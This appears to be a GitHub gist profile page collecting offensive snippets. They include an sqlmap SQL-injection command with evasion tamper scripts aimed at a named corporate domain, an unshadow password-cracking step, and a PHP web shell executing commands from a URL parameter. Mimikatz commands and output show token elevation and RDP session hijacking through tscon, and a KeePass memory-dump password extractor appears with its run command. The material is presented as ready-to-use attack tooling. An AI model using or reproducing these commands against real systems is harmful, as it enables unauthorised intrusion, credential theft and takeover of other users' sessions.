Skip to content

Instantly share code, notes, and snippets.

View c0d3x27's full-sized avatar
:octocat:
Working from home

c0d3x27 c0d3x27

:octocat:
Working from home
View GitHub Profile
{ "id":
"username":"c0d3x27@corp.tesla.eu"
"email":"teslaemployeeemail@tesla.eu
"active":true,
"registered":"Fidel C."
"role":"03"
"site":[
],
"company":[
]
@c0d3x27
c0d3x27 / modified body
Created April 18, 2024 08:46
hacking hackers3
{
"name": "HELLKO"
"account": "jkk"
"active": "true"
}
@c0d3x27
c0d3x27 / sqlmap
Last active April 18, 2024 00:00
Hacking Hackers 3
sqlmap -u https://documents.tesla.eu/busydoc.dc?id= --banner --random-agent -v 3 --tamper="apostrophemask,apostrophenullencode,between,chardoubleencode,charencode,charunicodeencode" --level=5 --risk=3 --dbms=mysql --current-db --current-user
The more information you feel the command the better it can perform
@c0d3x27
c0d3x27 / backdoors
Created February 5, 2024 14:09
hacking hackers
kali@kali:~$ unshadow passwd.txt shadow.txt
kali@kali:~$ unshadow passwd.txt shadow.txt > unshadowed.txt
@c0d3x27
c0d3x27 / Get in
Created February 5, 2024 13:22
hacking hackers
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@c0d3x27
c0d3x27 / rdp
Last active July 24, 2023 14:59
how to rdp2
mimikatz # ts::remote /id:1 #This will fail if you didnt started the session as SYSTEM
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
640 {0;000003e7} 0 D 35719 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary
-> Impersonated !
@c0d3x27
c0d3x27 / drp1
Created July 24, 2023 14:44
How to rdp
mimikatz # ts::sessions
Session: 1 - RDP-Tcp#0
state: Active (0)
user : Administrator @ hacklab
Conn : 9/25/2021 2:09:14 AM
disc : 9/25/2021 2:09:13 AM
logon: 9/25/2021 12:35:03 AM
last : 9/25/2021 6:45:06 AM
curr : 9/25/2021 6:48:11 AM
sc create sesshijack binpath= "cmd.exe /k tscon 3 /dest:rdp-tcp#2"
net start sesshijack
@c0d3x27
c0d3x27 / Program.cs
Created June 21, 2023 09:25
keepass
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
namespace keepass_password_dumper
{
internal static class Program
{
private const string AllowedChars = "^[\x20-\x7E]+$";
private const int BufferSize = 524288;
@c0d3x27
c0d3x27 / cmd.exe
Last active June 21, 2023 10:40
keypass
dotnet run c:\test\KeePass.DMP